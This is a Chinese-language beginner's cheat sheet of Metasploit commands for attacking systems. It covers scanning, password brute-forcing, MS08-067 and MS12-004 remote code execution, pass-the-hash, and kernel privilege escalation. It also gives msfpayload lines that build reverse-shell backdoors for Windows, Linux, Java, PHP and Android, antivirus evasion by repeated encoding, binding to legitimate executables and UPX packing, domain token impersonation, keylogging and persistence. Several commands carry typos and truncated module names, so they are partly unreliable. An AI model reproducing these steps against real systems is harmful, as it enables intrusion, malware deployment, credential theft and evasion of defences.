小白笔记-----------------------Metasploit (from tools)整理
笪健
2023-12-01
1、msf更新
命令:./msfupdate
2、nmap扫描
命令:nmap命令
3、msf内置扫描
命令:search portscan
之后调用
show options 显示设置参数
4、msf SMB获取系统信息
命令:use auxiliary/scanner/smb/smb_version
5、msf服务识别
命令:ssh:
use auxiliary/scanner/ssh/ssh_version
ftp:
use auxiliary/scanner/ftp/ftp_version
6、密码嗅探
命令: ftp密码嗅探:
use auxiliary/sniffer/psnuffle
7、snmp扫描
命令:search snmp
use 其中一个
show options
完成设置
snmp枚举:
use auxiliary/scanner/snmp/snmp_enum
8、SMB登陆验证(microsoft 网络共享协议)
命令:use auxiliary/scanner/smb/smb_lo
9、VNC身份识别(远程控制)
命令:
use auxiliary/scanner/vnc/vnc_none_auths
10、wmap web扫描
命令:load wmap
wmap_sites
查看参数
wmap_sites -l
查看结果
wamp_targets -h
设置参数
wmap_targets -l
查看结果
wmap_run -h
wmap_run -t (进行扫描)
wmap_run -e (进行测试)
查看扫描结果
wmap_vulns -l
11、远程代码执行
漏洞:MS08_067
命令:search 08_067
use exploit/windows/smb/ms08_067_netapi
设置参数,选择载荷
set paload reverse_tcp(非常常用的载荷)
设置目标版本号
set target
12、MIDI文件解析远程代码执行
漏洞:ms12_004
命令:use (调用一下)
show options
exploit (生成url)
set url(修改url)
让对方访问url
sessions(查看会话)
sessions -i 1(获得会话)
13、口令安全
命令:search mysql_login(mysql 服务)
use
show options
set USERNAME
set PASS_FILE
search ssh_login(ssh 服务)
操作类似
14、Hash值传递参数
命令:在不知道密码的情况下:
知道密码的情况下;
use exploit/windows/smb/psexec
进行设置
exploit
hashdump(获取hash值)
set smbpass +hash值(可以直接用hash值登陆)
15、NDProxy内核提权
命令:建立会话之后
search ms14_002
用这个漏洞提升自己的权限
set session 1
exploit 攻击
16、多种后门生成
命令:主要是用payloads
msfpayload windows/meterpreter/reverse_tcp LHOST= **** LPORT=*** x
>/ ***.exe
生成了后门
将后门放到目标机器中
在msf中有一个监听的程序
search handler
use exploit/multi/handler
show options
set payload 设置刚刚的payload windows/meterpreter/reverse_tcp
配置一下参数,设置端口和ip
在目标机子上运行后门,反弹一个shell
linux后门:
msfpayload linux/x86/shell_reverse_tcp LHOST=**
LPORT=*** x>linux
给他权限,
./linux
同时还要监听相应的端口
生成java后门:
msfpayload java/meterpreter/reverse_tcp LHOST=** LPORT=**
w>123.jar
生成php后门:
msfpayload php/meterpreter/reverse_tcp LHOST=*** LPORT=**
R | msfencode -e php/base64 -t raw -o 1.php
生成android后门:
msfpayload android/meterpreter/reverse_tcp LHOST=*8 LPORT=**
R>1.apk
17、内网渗透
命令:获得shell
扫描c段
run get_local_subnets
查看域环境
use incognito
list_tokens -u
impersonate_token (获得域管理的权限)
shell(进入域管理shell)
如果没有域管理
18、反反病毒(免杀)
1、加壳
2、用汇编的方法改变
命令: 先生成后门
msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -t exe >123.exe
用编码的方式来免杀
调用多个编码进行多次免杀
msfencode -L(查看可用编码,有的编码可以重复使用)
msfpayload windows/meterprter/reverse_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -c 10 -t exe>123.exe
绑定正常文件
msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -t exe -x /root/ftp.exe -o 123.exe
加壳
upx - 5 /123.exe
19、XSS
命令: search keylogger
use 其中一个
set DEMO true
set URLPATH
set srvport
20、维持访问(后门)
命令: 有一个会话
run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
实现主动连接
keyscan_start (键盘记录)
keyscan_dump